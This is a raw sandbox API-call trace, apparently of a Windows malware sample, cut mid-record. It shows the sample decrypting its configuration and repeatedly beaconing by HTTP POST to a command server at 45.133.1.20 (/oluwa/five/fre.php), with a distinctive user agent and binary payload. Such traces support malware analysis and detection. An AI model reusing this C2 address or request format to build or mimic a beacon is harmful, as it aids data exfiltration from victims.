ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.382] GetProcessHeap () returned 0x6a0000 [0192.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0192.383] GetProcessHeap () returned 0x6a0000 [0192.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.383] GetProcessHeap () returned 0x6a0000 [0192.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0192.384] GetProcessHeap () returned 0x6a0000 [0192.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0192.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0192.405] GetProcessHeap () returned 0x6a0000 [0192.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0192.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.406] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0192.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.407] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.411] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.411] GetProcessHeap () returned 0x6a0000 [0192.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0192.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.412] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0192.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.414] CryptDestroyKey (hKey=0x6ad560) returned 1 [0192.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.415] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0192.415] GetProcessHeap () returned 0x6a0000 [0192.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.416] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0192.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.417] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0192.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.421] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0192.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0192.422] GetProcessHeap () returned 0x6a0000 [0192.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0192.422] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0192.422] GetProcessHeap () returned 0x6a0000 [0192.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0192.422] socket (af=2, type=1, protocol=6) returned 0x4ac [0192.423] connect (s=0x4ac, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0192.448] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0192.448] GetProcessHeap () returned 0x6a0000 [0192.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0192.449] GetProcessHeap () returned 0x6a0000 [0192.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0192.449] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.451] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.451] GetProcessHeap () returned 0x6a0000 [0192.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0192.451] GetProcessHeap () returned 0x6a0000 [0192.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.452] GetProcessHeap () returned 0x6a0000 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0192.452] GetProcessHeap () returned 0x6a0000 [0192.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0192.453] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.454] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.454] GetProcessHeap () returned 0x6a0000 [0192.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0192.454] GetProcessHeap () returned 0x6a0000 [0192.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.454] send (s=0x4ac, buf=0x6b5c98*, len=242, flags=0) returned 242 [0192.455] send (s=0x4ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0192.455] GetProcessHeap () returned 0x6a0000 [0192.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0192.455] recv (in: s=0x4ac, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0192.540] GetProcessHeap () returned 0x6a0000 [0192.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0192.540] GetProcessHeap () returned 0x6a0000 [0192.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0192.541] GetProcessHeap () returned 0x6a0000 [0192.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0192.542] GetProcessHeap () returned 0x6a0000 [0192.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0192.542] closesocket (s=0x4ac) returned 0 [0192.543] GetProcessHeap () returned 0x6a0000 [0192.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0192.543] GetProcessHeap () returned 0x6a0000 [0192.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.543] GetProcessHeap () returned 0x6a0000 [0192.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0192.543] GetProcessHeap () returned 0x6a0000 [0192.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0192.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1280) returned 0x4ac [0192.547] Sleep (dwMilliseconds=0xea60) [0192.548] GetProcessHeap () returned 0x6a0000 [0192.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0192.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0192.573] GetProcessHeap () returned 0x6a0000 [0192.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0192.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.575] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0192.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.576] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.580] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.580] GetProcessHeap () returned 0x6a0000 [0192.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0192.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.598] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0192.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.603] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0192.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.604] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0192.604] GetProcessHeap () returned 0x6a0000 [0192.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.605] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.607] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.608] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.609] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.609] GetProcessHeap () returned 0x6a0000 [0192.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0192.609] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.610] GetProcessHeap () returned 0x6a0000 [0192.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0192.613] GetProcessHeap () returned 0x6a0000 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.614] GetProcessHeap () returned 0x6a0000 [0192.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0192.614] GetProcessHeap () returned 0x6a0000 [0192.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0192.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0192.633] GetProcessHeap () returned 0x6a0000 [0192.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0192.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.634] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0192.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.635] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.637] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.637] GetProcessHeap () returned 0x6a0000 [0192.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0192.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.639] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0192.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.640] CryptDestroyKey (hKey=0x6ad020) returned 1 [0192.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.641] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0192.641] GetProcessHeap () returned 0x6a0000 [0192.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0192.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.646] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0192.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0192.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.648] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0192.649] GetProcessHeap () returned 0x6a0000 [0192.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0192.649] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0192.649] GetProcessHeap () returned 0x6a0000 [0192.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0192.649] socket (af=2, type=1, protocol=6) returned 0x4b0 [0192.649] connect (s=0x4b0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0192.679] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0192.679] GetProcessHeap () returned 0x6a0000 [0192.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0192.679] GetProcessHeap () returned 0x6a0000 [0192.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0192.680] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.681] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.681] GetProcessHeap () returned 0x6a0000 [0192.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0192.681] GetProcessHeap () returned 0x6a0000 [0192.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.682] GetProcessHeap () returned 0x6a0000 [0192.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0192.682] GetProcessHeap () returned 0x6a0000 [0192.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0192.683] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.684] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.684] GetProcessHeap () returned 0x6a0000 [0192.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0192.684] GetProcessHeap () returned 0x6a0000 [0192.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.684] send (s=0x4b0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0192.685] send (s=0x4b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0192.685] GetProcessHeap () returned 0x6a0000 [0192.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0192.685] recv (in: s=0x4b0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0192.762] GetProcessHeap () returned 0x6a0000 [0192.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0192.762] GetProcessHeap () returned 0x6a0000 [0192.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0192.762] GetProcessHeap () returned 0x6a0000 [0192.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0192.763] GetProcessHeap () returned 0x6a0000 [0192.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0192.763] closesocket (s=0x4b0) returned 0 [0192.765] GetProcessHeap () returned 0x6a0000 [0192.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0192.765] GetProcessHeap () returned 0x6a0000 [0192.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.779] GetProcessHeap () returned 0x6a0000 [0192.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0192.781] GetProcessHeap () returned 0x6a0000 [0192.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0192.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1294) returned 0x4b0 [0192.783] Sleep (dwMilliseconds=0xea60) [0192.785] GetProcessHeap () returned 0x6a0000 [0192.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0192.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0192.841] GetProcessHeap () returned 0x6a0000 [0192.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0192.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.847] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0192.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.848] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.849] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.850] GetProcessHeap () returned 0x6a0000 [0192.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0192.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.851] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0192.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.853] CryptDestroyKey (hKey=0x6ad020) returned 1 [0192.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.855] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0192.855] GetProcessHeap () returned 0x6a0000 [0192.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.856] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0192.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0192.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.858] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0192.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0192.860] GetProcessHeap () returned 0x6a0000 [0192.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0192.860] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0192.860] GetProcessHeap () returned 0x6a0000 [0192.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0192.861] GetProcessHeap () returned 0x6a0000 [0192.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0192.861] GetProcessHeap () returned 0x6a0000 [0192.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0192.861] GetProcessHeap () returned 0x6a0000 [0192.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0192.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.863] 